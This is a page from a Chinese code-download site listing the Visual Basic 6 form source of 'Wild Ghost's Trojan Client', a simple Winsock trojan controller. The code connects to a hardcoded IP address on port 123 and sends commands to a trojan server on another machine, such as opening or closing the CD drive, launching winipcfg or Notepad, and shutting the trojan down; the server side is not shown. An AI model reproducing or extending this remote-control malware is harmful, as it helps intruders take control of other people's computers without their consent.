⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 form1.frm

📁 用winsock简单的木马程序
💻 FRM
字号:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form Form1 
   Caption         =   "Wild Ghost's Trojan Client"
   ClientHeight    =   5235
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   6840
   LinkTopic       =   "Form1"
   ScaleHeight     =   5235
   ScaleWidth      =   6840
   StartUpPosition =   3  'Windows Default
   Begin VB.CommandButton Command6 
      Caption         =   "RUN NOTEPAD"
      Height          =   375
      Left            =   120
      TabIndex        =   9
      Top             =   2640
      Width           =   6495
   End
   Begin VB.CommandButton Command5 
      Caption         =   "RUN WINIPCFG"
      Height          =   375
      Left            =   120
      TabIndex        =   5
      Top             =   2160
      Width           =   6495
   End
   Begin VB.CommandButton Command4 
      Caption         =   "TURN OFF THE TROJAN"
      Height          =   495
      Left            =   1080
      TabIndex        =   4
      Top             =   4560
      Width           =   5055
   End
   Begin VB.CommandButton Command3 
      Caption         =   "CLOSE THE CD ROM!"
      Height          =   375
      Left            =   4080
      TabIndex        =   3
      Top             =   1560
      Width           =   2535
   End
   Begin VB.CommandButton Command2 
      Caption         =   "OPEN THE CD ROM!"
      Height          =   375
      Left            =   120
      TabIndex        =   2
      Top             =   1560
      Width           =   2535
   End
   Begin MSWinsockLib.Winsock Winsock1 
      Left            =   120
      Top             =   4800
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.TextBox Text1 
      Height          =   375
      Left            =   2400
      TabIndex        =   1
      Text            =   "209.187.154.73"
      Top             =   120
      Width           =   3375
   End
   Begin VB.CommandButton Command1 
      Caption         =   "Connect"
      Height          =   375
      Left            =   120
      TabIndex        =   0
      Top             =   120
      Width           =   2055
   End
   Begin VB.Label Label4 
      Caption         =   "STATUS: NOT CONNECTED"
      Height          =   255
      Left            =   3840
      TabIndex        =   8
      Top             =   1080
      Width           =   2775
   End
   Begin VB.Label Label3 
      Caption         =   "Trojan Version:"
      Height          =   255
      Left            =   120
      TabIndex        =   7
      Top             =   1080
      Width           =   3015
   End
   Begin VB.Label Label1 
      Alignment       =   2  'Center
      Caption         =   "Trojan Server Information"
      Height          =   255
      Left            =   1560
      TabIndex        =   6
      Top             =   720
      Width           =   3255
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Command1_Click()
Winsock1.Close
Winsock1.Connect Text1.Text, 123
End Sub

Private Sub Command2_Click()
Dim stdata As String
stdata = "OPENCD"
Winsock1.SendData stdata
End Sub

Private Sub Command3_Click()
Dim strdata As String
strdata = "CLOSECD"
Winsock1.SendData strdata
End Sub

Private Sub Command4_Click()
Dim str3data As String
str3data = "CLOSEME"
Winsock1.SendData str3data
Label4.Caption = "STATUS: Disconnected"
End Sub

Private Sub Command5_Click()
Dim str1data As String
str1data = "RUNWINIPCFG"
Winsock1.SendData str1data
End Sub

Private Sub Command6_Click()
Dim str1data As String
str1data = "RUNNOTEPAD"
Winsock1.SendData str1data
End Sub

Private Sub Form_Load()
End Sub

Private Sub Winsock1_Connect()
'Me.Caption = "I think we're connected"
Label4.Caption = "STATUS:  CONNECTED!"
Me.Caption = "Getting Trojan Information"
Winsock1.SendData "TROJAN"
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim strdata1, strdata2, strdata3, strdata4 As String

Winsock1.GetData strdata1, vbString
Me.Caption = "WildGhost's Trojan Client"
Label4.Caption = "STATUS:  READY!"
Label3.Caption = "Trojan Version: " + strdata1
End Sub

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -